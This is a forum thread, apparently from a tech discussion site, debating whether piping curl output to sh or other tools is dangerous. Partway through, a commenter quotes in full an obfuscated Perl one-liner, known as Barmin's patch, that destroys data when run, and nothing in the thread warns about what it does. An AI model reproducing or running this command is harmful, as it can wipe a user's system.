What happened?

This was like 13 years ago, but it in essence rm -rvf / ... but it was a obfuscated one liner that some dick put out there as a joke. Result was having to restore a site and lose a few weeks of posts.

It's generally an easy way to introduce malicious shell scripts into remote machines operated by people who don't know about this.

There's a blog dedicated to shaming sites that do this: https://curlpipesh.tumblr.com/#_=_

Have you ever downloaded and installed a program through a web browser? Is there a practical difference between that and piping to sh, besides a GUI?

If you install through a GUI or a package manager, it will often check a cryptographic signature to validate that you downloaded the genuine thing, and you weren't man-in-the-middle'd with some malware. Also, it will check that nothing was corrupted in transit.

But generally speaking, you're right. You're taking a risk every time you run executable code from the internet, and if you don't want to live in a paranoid state of fear constantly, you have to balance security and convenience. If you check that it says "https" in the beginning and that you trust the source, then you're probably fine.

But they aren't piping to sh..

The infamous Barmin's patch doesn't have any `sh` mentions either:

``` echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' ```

Yeah, but if there's a code execution vulnerability in any of the tools in the pipeline it's as good as piping to sh.

Yup! Using curl at all is downright dangerous.

/s

Well, it's all about risk assessment. Curl has had RCE security bugs before[1]. That doesn't mean curl is "downright dangerous" it just means that "it's safe because it doesn't pipe to sh" is also not a correct thing to say.

[1]: http://blog.volema.com/curl-rce.html

Incidentally, cURL just had a major security audit. The dev is doing due diligence to avoid RCE vulnerabilities.

Piping to jq and sed is just fine. I'm not sure where sh comes into this...

Unless there's a bug in curl, jq or sed that leads to an RCE, which is what my point was.

I suppose 'devoply pattern-matched "curl -sS <sth> | <sth else>" to "don't do that". I think that because that's exactly what I did now; it took me a few seconds to realize that - this time - the invocation is mostly harmless.